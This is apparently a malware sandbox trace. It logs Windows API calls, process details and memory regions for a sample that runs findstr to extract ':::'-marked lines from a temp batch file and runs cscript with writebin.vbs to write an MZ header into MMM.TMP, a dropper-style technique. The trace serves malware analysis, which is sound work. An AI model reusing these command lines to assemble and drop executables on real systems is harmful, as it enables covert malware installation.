[0380.910] FindFirstFileW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), lpFindFileData=0x1ee750 | out: lpFindFileData=0x1ee750*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x7751f030, ftLastAccessTime.dwHighDateTime=0x1dab598, ftLastWriteTime.dwLowDateTime=0x7751f030, ftLastWriteTime.dwHighDateTime=0x1dab598, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System32", cAlternateFileName="")) returned 0x21f4a0
[0380.911] FindClose (in: hFindFile=0x21f4a0 | out: hFindFile=0x21f4a0) returned 1
[0380.911] memcpy (in: _Dst=0x1eea56, _Src=0x1ee77c, _Size=0x10 | out: _Dst=0x1eea56) returned 0x1eea56
[0380.911] GetFileAttributesW (lpFileName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 0x10
[0380.911] SetCurrentDirectoryW (lpPathName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 1
[0380.911] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Windows\\System32") returned 1
[0380.911] GetProcessHeap () returned 0x200000
[0380.911] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21cbf0 | out: hHeap=0x200000) returned 1
[0380.912] GetEnvironmentStringsW () returned 0x22a820*
[0380.912] GetProcessHeap () returned 0x200000
[0380.912] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0xb9e) returned 0x21cbf0
[0380.912] memcpy (in: _Dst=0x21cbf0, _Src=0x22a820, _Size=0xb9e | out: _Dst=0x21cbf0) returned 0x21cbf0
[0380.912] FreeEnvironmentStringsW (penv=0x22a820) returned 1
[0380.912] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a28c0a0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
[0380.912] GetProcessHeap () returned 0x200000
[0380.912] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x216d70 | out: hHeap=0x200000) returned 1
[0380.912] GetProcessHeap () returned 0x200000
[0380.912] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b060 | out: hHeap=0x200000) returned 1
[0380.912] SetEnvironmentStringsW (NewEnvironment=0x21c040) returned 1
[0380.913] GetProcessHeap () returned 0x200000
[0380.913] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21cbf0 | out: hHeap=0x200000) returned 1
[0380.913] GetEnvironmentStringsW () returned 0x22a820*
[0380.913] GetProcessHeap () returned 0x200000
[0380.913] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0xb9e) returned 0x21cbf0
[0380.913] memcpy (in: _Dst=0x21cbf0, _Src=0x22a820, _Size=0xb9e | out: _Dst=0x21cbf0) returned 0x21cbf0
[0380.913] FreeEnvironmentStringsW (penv=0x22a820) returned 1
[0380.913] GetProcessHeap () returned 0x200000
[0380.913] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21c040 | out: hHeap=0x200000) returned 1
[0380.913] GetProcessHeap () returned 0x200000
[0380.914] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x219a10 | out: hHeap=0x200000) returned 1
[0380.914] GetProcessHeap () returned 0x200000
[0380.914] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x22a3d0 | out: hHeap=0x200000) returned 1
[0380.914] _get_osfhandle (_FileHandle=2) returned 0x64
[0380.914] GetFileType (hFile=0x64) returned 0x2
[0380.914] GetStdHandle (nStdHandle=0xfffffff4) returned 0x64
[0380.914] GetConsoleMode (in: hConsoleHandle=0x64, lpMode=0x1eec18 | out: lpMode=0x1eec18) returned 0
[0380.914] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2330, dwLanguageId=0x0, lpBuffer=0x4a296340, nSize=0x2000, Arguments=0x0 | out: lpBuffer="No batch label specified to GOTO command.\r\n") returned 0x2b
[0380.915] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2330, dwLanguageId=0x0, lpBuffer=0x4a296340, nSize=0x2000, Arguments=0x1eecc0 | out: lpBuffer="No batch label specified to GOTO command.\r\n") returned 0x2b
[0380.915] _get_osfhandle (_FileHandle=2) returned 0x64
[0380.915] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="No batch label specified to GOTO command.\r\n", cchWideChar=-1, lpMultiByteStr=0x4a28c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="No batch label specified to GOTO command.\r\n", lpUsedDefaultChar=0x0) returned 44
[0380.915] WriteFile (in: hFile=0x64, lpBuffer=0x4a28c320*, nNumberOfBytesToWrite=0x2b, lpNumberOfBytesWritten=0x1eec48, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesWritten=0x1eec48*=0x2b, lpOverlapped=0x0) returned 1
[0380.915] _dup2 (_FileHandleSrc=3, _FileHandleDst=2) returned 0
[0380.916] _close (_FileHandle=3) returned 0
[0380.917] GetConsoleTitleW (in: lpConsoleTitle=0x1ef240, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
[0380.917] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x201d70, Size=0x78) returned 0x201d70
[0380.917] GetProcessHeap () returned 0x200000
[0380.917] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x201d70) returned 0x78
[0380.917] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x220470, Size=0x78) returned 0x220470
[0380.918] GetProcessHeap () returned 0x200000
[0380.918] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x220470) returned 0x78
[0380.918] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x1eeda0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
[0380.918] GetProcessHeap () returned 0x200000
[0380.918] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x58) returned 0x21f4a0
[0380.918] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x1edcb0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
[0380.918] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x1edf68, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x1ee7c0, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x1edf68*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1
[0380.918] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8
[0380.918] GetProcessHeap () returned 0x200000
[0380.919] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x58) returned 0x21f500
[0380.919] GetProcessHeap () returned 0x200000
[0380.919] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x260) returned 0x21d7a0
[0380.919] _wcsicmp (_String1="check01.bat", _String2=".") returned 53
[0380.919] _wcsicmp (_String1="check01.bat", _String2="..") returned 53
[0380.919] GetFileAttributesW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\check01.bat")) returned 0x2020
[0380.919] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x201750 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
[0380.919] SetErrorMode (uMode=0x0) returned 0x0
[0380.919] SetErrorMode (uMode=0x1) returned 0x0
[0380.920] GetFullPathNameW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat", nBufferLength=0x104, lpBuffer=0x1edcd0, lpFilePart=0x1edcc0 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat", lpFilePart=0x1edcc0*="check01.bat") returned 0x30
[0380.920] SetErrorMode (uMode=0x0) returned 0x1
[0380.920] GetFileAttributesW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp")) returned 0x2010
[0380.920] GetProcessHeap () returned 0x200000
[0380.920] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x260) returned 0x218f10
[0380.920] _wcsicmp (_String1="check01.bat", _String2=".") returned 53
[0380.920] _wcsicmp (_String1="check01.bat", _String2="..") returned 53
[0380.920] GetFileAttributesW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\check01.bat")) returned 0x2020
[0380.921] FindFirstFileExW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\check01.bat"), fInfoLevelId=0x0, lpFindFileData=0x21dd54, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x21dd54) returned 0x21f560
[0380.921] DeleteFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\check01.bat")) returned 1
[0380.923] FindNextFileW (in: hFindFile=0x21f560, lpFindFileData=0x21dd54 | out: lpFindFileData=0x21dd54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf63dd9e0, ftCreationTime.dwHighDateTime=0x1dab598, ftLastAccessTime.dwLowDateTime=0xf63dd9e0, ftLastAccessTime.dwHighDateTime=0x1dab598, ftLastWriteTime.dwLowDateTime=0x99073dc0, ftLastWriteTime.dwHighDateTime=0x1dab598, nFileSizeHigh=0x0, nFileSizeLow=0xf32, dwReserved0=0x0, dwReserved1=0x0, cFileName="check01.bat", cAlternateFileName="")) returned 0
[0380.924] GetLastError () returned 0x12
[0380.924] FindClose (in: hFindFile=0x21f560 | out: hFindFile=0x21f560) returned 1
[0380.924] GetProcessHeap () returned 0x200000
[0380.924] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21dd40 | out: hHeap=0x200000) returned 1
[0380.924] GetProcessHeap () returned 0x200000
[0380.924] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x220500 | out: hHeap=0x200000) returned 1
[0380.924] GetProcessHeap () returned 0x200000
[0380.924] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b060 | out: hHeap=0x200000) returned 1
[0380.924] GetProcessHeap () returned 0x200000
[0380.924] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x219a10 | out: hHeap=0x200000) returned 1
[0380.924] GetProcessHeap () returned 0x200000
[0380.925] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x218f10 | out: hHeap=0x200000) returned 1
[0380.925] GetProcessHeap () returned 0x200000
[0380.925] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x201740 | out: hHeap=0x200000) returned 1
[0380.925] GetProcessHeap () returned 0x200000
[0380.925] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21d7a0 | out: hHeap=0x200000) returned 1
[0380.925] GetProcessHeap () returned 0x200000
[0380.926] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21f500 | out: hHeap=0x200000) returned 1
[0380.926] GetProcessHeap () returned 0x200000
[0380.926] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21f4a0 | out: hHeap=0x200000) returned 1
[0380.926] GetProcessHeap () returned 0x200000
[0380.926] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x233580 | out: hHeap=0x200000) returned 1
[0380.926] GetProcessHeap () returned 0x200000
[0380.926] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x220470 | out: hHeap=0x200000) returned 1
[0380.926] _get_osfhandle (_FileHandle=1) returned 0x7
[0380.926] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0380.952] _get_osfhandle (_FileHandle=1) returned 0x7
[0380.952] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a27e194 | out: lpMode=0x4a27e194) returned 1
[0380.953] _get_osfhandle (_FileHandle=0) returned 0x3
[0380.953] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a27e198 | out: lpMode=0x4a27e198) returned 1
[0380.953] SetConsoleInputExeNameW () returned 0x1
[0380.953] GetConsoleOutputCP () returned 0x1b5
[0380.954] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a28bfe0 | out: lpCPInfo=0x4a28bfe0) returned 1
[0380.954] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
[0380.954] CmdBatNotification () returned 0x0
[0380.955] _get_osfhandle (_FileHandle=1) returned 0x7
[0380.955] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0380.955] _get_osfhandle (_FileHandle=1) returned 0x7
[0380.955] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a27e194 | out: lpMode=0x4a27e194) returned 1
[0380.956] _get_osfhandle (_FileHandle=0) returned 0x3
[0380.956] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a27e198 | out: lpMode=0x4a27e198) returned 1
[0380.957] SetConsoleInputExeNameW () returned 0x1
[0380.957] GetConsoleOutputCP () returned 0x1b5
[0380.957] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a28bfe0 | out: lpCPInfo=0x4a28bfe0) returned 1
[0380.957] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
[0380.958] exit (_Code=0)
Process:
id = "10"
image_name = "findstr.exe"
filename = "c:\\windows\\system32\\findstr.exe"
page_root = "0x78c08000"
os_pid = "0xc2c"
os_integrity_level = "0x2000"
os_privileges = "0x800000"
monitor_reason = "child_process"
parent_id = "9"
os_parent_pid = "0xb34"
cmd_line = "findstr /r \"^[^a-z]*:::\" \"C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat\" "
cur_dir = "C:\\Windows\\system32\\"
os_username = "Q9IATRKPRH\\kEecfMwgj"
bitness = "32"
os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0ba" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 1795
start_va = 0x10000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 1796
start_va = 0x30000
end_va = 0x33fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 1797
start_va = 0x40000
end_va = 0x40fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 1798
start_va = 0x150000
end_va = 0x1cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000150000"
filename = ""
Region:
id = 1799
start_va = 0x77880000
end_va = 0x77a28fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 1800
start_va = 0x7efe0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efe0000"
filename = ""
Region:
id = 1801
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 1802
start_va = 0xff2f0000
end_va = 0xff305fff
monitored = 0
entry_point = 0xff2f23b8
region_type = mapped_file
name = "findstr.exe"
filename = "\\Windows\\System32\\findstr.exe" (normalized: "c:\\windows\\system32\\findstr.exe")
Region:
id = 1803
start_va = 0x7feffba0000
end_va = 0x7feffba0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 1804
start_va = 0x7fffffb0000
end_va = 0x7fffffd2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000007fffffb0000"
filename = ""
Region:
id = 1805
start_va = 0x7fffffdd000
end_va = 0x7fffffdefff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdd000"
filename = ""
Region:
id = 1806
start_va = 0x7fffffdf000
end_va = 0x7fffffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdf000"
filename = ""
Region:
id = 1807
start_va = 0x1d0000
end_va = 0x39ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001d0000"
filename = ""
Region:
id = 1808
start_va = 0x77660000
end_va = 0x7777efff
monitored = 0
entry_point = 0x77675340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 1809
start_va = 0x7fefd920000
end_va = 0x7fefd98bfff
monitored = 0
entry_point = 0x7fefd922780
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 1810
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 1811
start_va = 0x7efe0000
end_va = 0x7f0dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 1812
start_va = 0x7f0e0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 1813
start_va = 0x20000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 1814
start_va = 0x50000
end_va = 0xb6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 1815
start_va = 0x7feff7d0000
end_va = 0x7feff86efff
monitored = 0
entry_point = 0x7feff7d25a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 1816
start_va = 0x77780000
end_va = 0x77879fff
monitored = 0
entry_point = 0x7779a2c8
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 1817
start_va = 0x7feff980000
end_va = 0x7feff9e6fff
monitored = 0
entry_point = 0x7feff98b03c
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 1818
start_va = 0x7fefef80000
end_va = 0x7fefef8dfff
monitored = 0
entry_point = 0x7fefef81080
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 1819
start_va = 0x7fefe120000
end_va = 0x7fefe1e8fff
monitored = 0
entry_point = 0x7fefe19a874
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 1820
start_va = 0x3a0000
end_va = 0x51ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003a0000"
filename = ""
Region:
id = 1821
start_va = 0x3a0000
end_va = 0x49ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003a0000"
filename = ""
Region:
id = 1822
start_va = 0x510000
end_va = 0x51ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000510000"
filename = ""
Region:
id = 1823
start_va = 0x520000
end_va = 0x6a7fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000520000"
filename = ""
Region:
id = 1824
start_va = 0xc0000
end_va = 0xe8fff
monitored = 0
entry_point = 0xc1010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 1825
start_va = 0xc0000
end_va = 0xe8fff
monitored = 0
entry_point = 0xc1010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 1826
start_va = 0x7feff950000
end_va = 0x7feff97dfff
monitored = 0
entry_point = 0x7feff951010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 1827
start_va = 0x7feff3d0000
end_va = 0x7feff4d8fff
monitored = 0
entry_point = 0x7feff3d1064
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 1828
start_va = 0x6b0000
end_va = 0x830fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000006b0000"
filename = ""
Region:
id = 1829
start_va = 0x840000
end_va = 0x1c3ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000840000"
filename = ""
Region:
id = 1830
start_va = 0xc0000
end_va = 0xc2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "findstr.exe.mui"
filename = "\\Windows\\System32\\en-US\\findstr.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\findstr.exe.mui")
Region:
id = 1831
start_va = 0xd0000
end_va = 0xd0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000d0000"
filename = ""
Region:
id = 1832
start_va = 0xe0000
end_va = 0xe0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000e0000"
filename = ""
Region:
id = 1833
start_va = 0x1c40000
end_va = 0x1f0efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 1834
start_va = 0xf0000
end_va = 0xf0fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "check01.bat"
filename = "\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\check01.bat")
Thread:
id = 91
os_tid = 0xc30
Process:
id = "11"
image_name = "cscript.exe"
filename = "c:\\windows\\system32\\cscript.exe"
page_root = "0x2470e000"
os_pid = "0xc38"
os_integrity_level = "0x2000"
os_privileges = "0x800000"
monitor_reason = "child_process"
parent_id = "9"
os_parent_pid = "0xb34"
cmd_line = "cscript //nologo \"C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\writebin.vbs\" \"4D5A50\" \"C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\MMM.TMP\""
cur_dir = "C:\\Windows\\system32\\"
os_username = "Q9IATRKPRH\\kEecfMwgj"
bitness = "32"
os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0ba" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 1836
start_va = 0x10000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 1837
start_va = 0x30000
end_va = 0x33fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 1838
start_va = 0x110000
end_va = 0x20ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000110000"
filename = ""
Region:
id = 1839
start_va = 0x77880000
end_va = 0x77a28fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 1840
start_va = 0x7efe0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efe0000"
filename = ""
Region:
id = 1841
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 1842
start_va = 0xfff30000
end_va = 0xfff58fff
monitored = 1
entry_point = 0xfff328c4
region_type = mapped_file
name = "cscript.exe"
filename = "\\Windows\\System32\\cscript.exe" (normalized: "c:\\windows\\system32\\cscript.exe")
Region:
id = 1843
start_va = 0x7feffba0000
end_va = 0x7feffba0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 1844
start_va = 0x7fffffb0000
end_va = 0x7fffffd2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000007fffffb0000"
filename = ""
Region:
id = 1845
start_va = 0x7fffffdd000
end_va = 0x7fffffdefff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdd000"
filename = ""
Region:
id = 1846
start_va = 0x7fffffdf000
end_va = 0x7fffffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdf000"
filename = ""
Region:
id = 1847
start_va = 0x2e0000
end_va = 0x3dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000002e0000"
filename = ""
Region:
id = 1848
start_va = 0x77660000
end_va = 0x7777efff
monitored = 0
entry_point = 0x77675340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 1849
start_va = 0x7fefd920000
end_va = 0x7fefd98bfff
monitored = 0
entry_point = 0x7fefd922780
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 1850
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 1851
start_va = 0x7efe0000
end_va = 0x7f0dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 1852
start_va = 0x7f0e0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 1853
start_va = 0x20000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 1854
start_va = 0x40000
end_va = 0xa6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 1855
start_va = 0x7feff7d0000
end_va = 0x7feff86efff
monitored = 0
entry_point = 0x7feff7d25a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 1856
start_va = 0x7feff550000
end_va = 0x7feff626fff
monitored = 0
entry_point = 0x7feff553274
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 1857
start_va = 0x7fefdf10000
end_va = 0x7fefe112fff
monitored = 0
entry_point = 0x7fefdf33330
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 1858
start_va = 0x7feff980000
end_va = 0x7feff9e6fff
monitored = 0
entry_point = 0x7feff98b03c
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 1859
start_va = 0x77780000
end_va = 0x77879fff
monitored = 0
entry_point = 0x7779a2c8
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 1860
start_va = 0x7fefef80000
end_va = 0x7fefef8dfff
monitored = 0
entry_point = 0x7fefef81080
region_type = mapped_file
name = "lpk.dll"
